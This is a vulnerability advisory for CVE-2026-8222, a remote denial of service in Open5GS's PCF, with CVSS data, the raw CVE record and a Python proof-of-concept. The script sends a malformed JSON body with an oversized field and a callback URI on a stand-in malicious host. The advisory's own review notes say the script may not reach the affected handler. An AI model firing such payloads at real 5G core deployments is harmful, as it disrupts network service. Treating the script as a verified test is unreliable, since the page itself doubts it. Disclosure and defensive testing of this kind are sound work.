Security Vulnerability Report
CVE-2026-8222 CVSS 5.3 MEDIUM

CVE-2026-8222

Published: 2026-05-10 03:16:09
Last Modified: 2026-05-12 17:49:05

Description

A vulnerability has been found in Open5GS up to 2.7.7. It affects the function pcf_nbsf_management_handle_register in the file src/pcf/nbsf-handler.c of the sm-policies endpoint component. Manipulation leads to denial of service. The attack can be performed remotely. The exploit has been publicly disclosed and may be used. The project was informed of the problem early through an issue report but has not yet responded.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
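CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Note: the score and vector shown here are the Secondary CVSS 3.1 assessment in the raw record below. The same record also carries a Primary CVSS 3.1 assessment of 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), which rates the availability impact as high rather than low.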

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS <= 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
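"""Lab reproduction sketch published with the CVE-2026-8222 entry (Open5GS PCF).

Sends a single JSON POST to a locally hosted PCF and reports what came back.

NOTE(review): the advisory text places the fault in
pcf_nbsf_management_handle_register (src/pcf/nbsf-handler.c, "sm-policies
Endpoint"), while this script posts to a policy-authorization path with a
generic oversized field. Nothing on the page shows that this request reaches
the affected handler, so a clean run here does not demonstrate that a
deployment is unaffected. The upstream issue listed in the record's
references is the authoritative description when validating a fix.
"""
import json

import requests

# Target configuration: loopback address of a lab instance.
target_host = "http://127.0.0.1:7777"
# Example endpoint related to PCF/SM policies (see the module note above).
endpoint = "/npcf-policyauthorization/v1/policies"

# Request body as published on the page.
# NOTE(review): the record classifies the weakness as CWE-404 (improper
# resource shutdown or release); the page gives no evidence of a buffer
# overflow, so the oversized "invalidData" field should be read as filler
# rather than as the confirmed trigger.
malformed_payload = {
    "notificationUri": "http://malicious.com/callback",
    "supi": "imsi-999999999999999",
    "invalidData": ["A" * 10000],
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json",
}


def trigger_dos():
    """POST the payload once and print how the service reacted.

    Returns None; the outcome is reported on stdout only.

    Any completed HTTP response, including 404 and 500, means the process
    was still answering when it replied, so it is reported as a response and
    not as a crash. A connection error or timeout is only suggestive: both
    also occur when nothing was listening on the port before the request.
    """
    try:
        print(f"[*] Sending exploit payload to {target_host}{endpoint}")
        response = requests.post(
            target_host + endpoint,
            data=json.dumps(malformed_payload),
            headers=headers,
            timeout=5,
        )
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused. The service may have crashed (DoS successful).")
    except requests.exceptions.Timeout:
        print("[+] Request timed out. Service may be hanging.")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")
    else:
        status = response.status_code
        if status == 404:
            # The route is not served on this instance; the service answered.
            print("[-] Server responded with status: 404 (route not found; service is still answering).")
        elif status == 500:
            # An error reply is still a reply; by itself it is not a crash.
            print("[*] Server responded with status: 500 (server error returned; service is still answering).")
        else:
            print(f"[-] Server responded with status: {status}")


if __name__ == "__main__":
    trigger_dos()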

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8222", "sourceIdentifier": "[email protected]", "published": "2026-05-10T03:16:08.690", "lastModified": "2026-05-12T17:49:04.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4437", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/submit/808427", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362439", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362439/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}